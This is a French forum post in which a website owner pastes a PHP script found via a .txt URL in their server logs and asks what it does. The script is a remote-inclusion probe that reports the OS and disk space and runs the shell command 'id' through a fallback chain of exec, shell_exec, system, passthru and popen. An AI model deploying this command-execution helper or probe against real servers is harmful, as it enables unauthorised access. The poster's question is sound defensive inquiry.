Bonsoir,
En regargant discretement mes logs de mon site, j'ai trouvé une adresse qui contenait un fichier .txt en fait un script php. Que fait ce script? qans une adresse:
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
 
<?
$dir = @getcwd();
echo "Mic22<br>";
$OS = @PHP_UNAME();
echo "OSTYPE:$OS<br>";
$free = disk_free_space($dir); 
 
if ($free === FALSE) {$free = 0;} 
 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
 
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
 
function view_size($size) 
 
{ 
 
if (!is_numeric($size)) {return FALSE;} 
 
else 
 
{ 
 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
 
else {$size = $size . " B";} 
 
return $size; 
 
}} 
 
exit;
En fait j'avais dèja reperèrer une adresse .ru qui contenait aussi un fichier txt et qui recherchait un mot de passe et essayait de construire un fichier r. Bidon ou non?